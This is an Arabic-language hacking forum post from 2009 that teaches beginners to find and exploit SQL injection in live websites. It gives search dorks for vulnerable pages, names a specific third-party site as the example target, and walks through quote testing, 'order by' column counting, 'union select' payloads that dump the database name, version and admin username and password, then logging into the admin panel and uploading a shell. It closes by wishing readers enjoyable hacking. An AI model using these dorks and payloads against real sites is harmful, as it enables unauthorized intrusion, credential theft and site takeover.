بسم الله الرحمن الرحيــم ..،،
عدنآ إليكم .. بعد غيبآت طويله ..،،
والمعذرهـ للكل .. !~
اليوم وانا جآلس وطفشآن ... وقلت خلينآ نسوي خير .. ^)^ .. وفكرت في الشيء هذآ .. ونزلت لكم درس من ثغرة SqL لعيون المبتدئين .. 
اليوم بشرح لكم شرح كتآبي .. + ... شرح بالفيديو ...
.........................................
اولاً ..:/ نبتدىء في الكتآبي ..
وهذآ الملف فيهآ اوامر اكواد او ثغرآت لتحقن الموقع .. مسآعده مني لكم .. يآلبى قلوبكم
آضغط على آسمي ..
-----------------
اولا .. عندك هذآ الآكواد لبحث المواقع المصآبه بالثغره ..
كود PHP:
allinanchor: article.php?id=
allinanchor: index.php?id=
allinanchor: news_view.php?id=
فمثلاً .. نفرض هذآ الكود ..
allinanchor: news_view.php?id=
نبحثه في قوقل ..
هكذآ يصير ..
ويوجد عدة مواقع كثيره منهآ مصابه ومنهآ غير مصآبه ..
كيف نعرف ان المواقع مصآبه آو غير مصآبه .. ؟
نذهب نختآر اي موقع من المواقع التي ضهرت في قوقل
نفترض هذآ الموقع ..
كود PHP:
http://www.walnutacres.com/news_view.php?id=14
كيف نعرف انها مصابه او لا .. ؟
نغير في الرآبط نضيف عليهآ هذآ الرمز علامة التنصيص ( ' )
فيصبح الرآبط هكذآ ..
فضهرت الصفحه مختلفه عن الآول .. / إذاً الموقع مصآب .. وإذا لم يختلف بشيء .. الموقع سليم من الثغره sql
انا عندي الموقع ظهرت مختلفه .. إذا الموقع مصآب بالثغره
فمآذآ نفعل ..؟
نضيف عليهآ هذآ الكود .. آمرين فقط .. ونعرف مسآر هذي اللوحه ..
كود PHP:
+order+by+2
فيصبح الرآبط هكذآ ..
كود PHP:
http://www.walnutacres.com/news_view.php?id=14+order+by+2
إذن لن ظهر الجداول او الاعمده لكي اعرف اي مسآر اليوزر والبآسورد آو بمى يسمى القواعد البيانات ..
بنغير رقم 2 إلى رقم 1 وإذا لم تظهر نغير من رقم 1 إلى 3 .... إلخ وهكذآ .. لمآ يطلع الصفحه القواعد مكان اليوزر يعني ..
انا ظهرت عندي هكذآ ..
رقم 4
كيف نطلع اليوزر والبآسورد من هذآ التعقد .. ؟ مآذا نفعل ..؟
نبدل الآكواد التي اضعناها هنآ order+by <- نضع بدآلهآ هكذا +union+select
وثم يصبح الرابط هكذآ ..
ولن تنسى الاشاره السالبه بعد كلمة id = - (الرقم ) هكذآ ..
ومن ثم نضيف عليهآ ثغره للإستخراج اسم القاعده واصدآرهآ ..
كود PHP:
unhex(hex(concat(database(),0x3a,version(),0x3a,user()))
فيصبح هكذآ ..
فيصبح المسآر على رقم 1 اسم القاعده واصدآرهآ
والآن نبي نطلع اليوزر والباسورد اللوحة التحكم تبع الموقع ..
نضيف عليهآ ايضاً ثغره او كود ..
لكي يستخرج لنآ اليوزر والباسورد .. هكذا ..
طبعاً هذا اليوزر
كود PHP:
unhex(hex(user))
وهذا الباسورد
كود PHP:
unhex(hex(pass))
فنضع رقم 1 اليوزر ورقم 2 الباسورد
فيصبح الرابط هكذآ ..
ومن ثم تذهب إلى لوحة الادآره هكذآ ..
فيصبح دخولك إلى لوحة التحكم وثم ارفع الشل وخلاص ومبروك الدعس .. ^)^
للآنه اغلبيه اللوحه التحكم بيكون هذآ المسآر .. بعد com/admin وانتهينآ ..
وعندي لكم مفآجئه ..
هذي هدآيه مني لكم ..
&
&
يالله تمتعوا بالآختراق .. 
-----------------------------------------------------------------------------
حبيت اوضحلكم تطبيق بالفيديو مفصل مثل ماشرحنآ لكم بالكتآبه ... 
[ والمقطع يطول اشوي للآنه شآرحه بالتفصيل ] 
آضغط على آسمي ..
وإن شاء الله بتكون الدرس مفهوووم ..
ويآليت كل واحد منكم الدعآء لي ولوالدي ..
وبالتوفيق حآيبي ..
وآي استفسآر انا حآظر ..
احترامي لكم ..:
بــــونآصـــر
KiLLer HaCkEr
-----------------------------------------------------------------------
طبعاً إهدآء خآص
إلى العنآكب وآعضآءهـ ..
11-13-2009, 01:50 AM
[ الدرس الآول ] شرح بالفيديو + بالتفصيل = ثغرة SQL Injection [ للمبتدئين ] .. 
المواضيع المتشابهه 
العرض العادي
